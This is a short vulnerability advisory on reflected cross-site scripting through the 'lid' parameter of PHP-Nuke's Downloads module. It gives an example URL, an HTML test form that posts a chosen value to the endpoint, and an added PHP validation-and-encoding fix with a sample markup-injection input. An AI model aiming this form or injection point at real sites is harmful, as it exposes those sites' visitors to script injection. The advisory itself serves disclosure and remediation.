PHP-Nuke Downloads Module Lid Parameter Cross-Site Scripting Vulnerability

The following example is available:

http://www.example.com/[nuke_dir]/modules.php?name=Downloads&d_op=outsidedownloadsetup&lid=[XSS]

To test for XSS in the lid parameter of http://www.example.com/[nuke_dir]/modules.php?name=Downloads&d_op=outsidedownloadsetup&lid=[XSS], we can
create a form that submits the same parameters by POST.

test.html :
-----------
<form name="mantra" method="POST" action="http://www.example.com/[nuke_dir]/modules.php">
<p>XSS:
<input type="text" name="lid">
<br>
<input type="hidden" name="name" value="Downloads">
<br>
<input type="hidden" name="d_op" value="outsidedownloadsetup">
</p>
<p>
<input type="submit" name="Submit" value="Go!">
<br>
</p>
</form>
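
A server-side fix for the reflected lid value, as an added example (not PHP-Nuke's own code and not part of the advisory). It assumes lid is a numeric download ID and that the module echoes it back into the page; the function names and the rendered markup are hypothetical.

```php
<?php
// Added example: strict validation plus output encoding for the "lid" parameter.
// Assumption: lid is a positive integer download ID. Names are hypothetical.

// Return lid as an int, or null when it is missing or not a plain positive integer.
function clean_lid(array $request): ?int
{
    $raw = $request['lid'] ?? null;
    if (!is_string($raw)) {
        return null;                      // missing, or an array such as lid[]=1
    }
    $lid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $lid === false ? null : $lid;  // markup and other text fail validation
}

// Encode any value before it is written into HTML text or a quoted attribute.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Stand-in for the page built by d_op=outsidedownloadsetup.
function render_setup_page(array $request): string
{
    $lid = clean_lid($request);
    if ($lid === null) {
        return '<p>Invalid download ID.</p>';   // never echo the rejected value
    }
    // Encoding is kept even though $lid is an int, so the output stays safe
    // if the validation above is later relaxed.
    return '<input type="hidden" name="lid" value="' . h((string) $lid) . '">';
}

// Constructed sample requests (GET or POST parameters merged into one array).
$samples = [
    ['name' => 'Downloads', 'd_op' => 'outsidedownloadsetup', 'lid' => '42'],
    ['name' => 'Downloads', 'd_op' => 'outsidedownloadsetup', 'lid' => '"><b>x</b>'],
    ['name' => 'Downloads', 'd_op' => 'outsidedownloadsetup', 'lid' => ['1']],
    ['name' => 'Downloads', 'd_op' => 'outsidedownloadsetup'],
];

foreach ($samples as $request) {
    echo render_setup_page($request), PHP_EOL;
}
```

Because the form above submits lid by POST while the example URL uses GET, the check has to run on the value regardless of request method.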


 

Copyright 2010, SecurityFocus